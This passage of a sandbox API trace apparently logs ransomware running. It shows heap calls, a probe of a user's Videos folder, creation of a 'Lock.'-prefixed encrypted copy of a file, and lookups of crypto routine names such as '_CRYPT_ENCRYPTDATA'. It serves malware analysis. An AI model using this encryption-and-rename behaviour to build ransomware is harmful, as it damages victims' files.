wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0257.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0257.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0257.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.352] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0257.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0257.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0257.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0257.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0257.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.0FMiSmnvsI1v8s.swf" (normalized: "c:\\users\\fd1hvy\\videos\\lock.0fmismnvsi1v8s.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0257.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0257.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0257.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0257.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0257.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0257.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0257.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0257.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0257.358] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0257.358] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x90f2, lpOverlapped=0x0) returned 1 [0257.361] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0257.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0257.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0257.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f2) returned 0x2f14010 [0257.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0257.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f2) returned 0x2f1d110 [0257.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0257.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f2) returned 0x2f14010 [0257.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0257.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0257.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.368] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f2) returned 0x2f14010 [0257.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e88 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0257.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90f2) returned 0x2f26210 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0257.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0257.371] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.371] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0257.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0257.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0257.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0257.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.374] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0257.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0257.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0257.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0257.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0257.375] PeekMessageW (in: 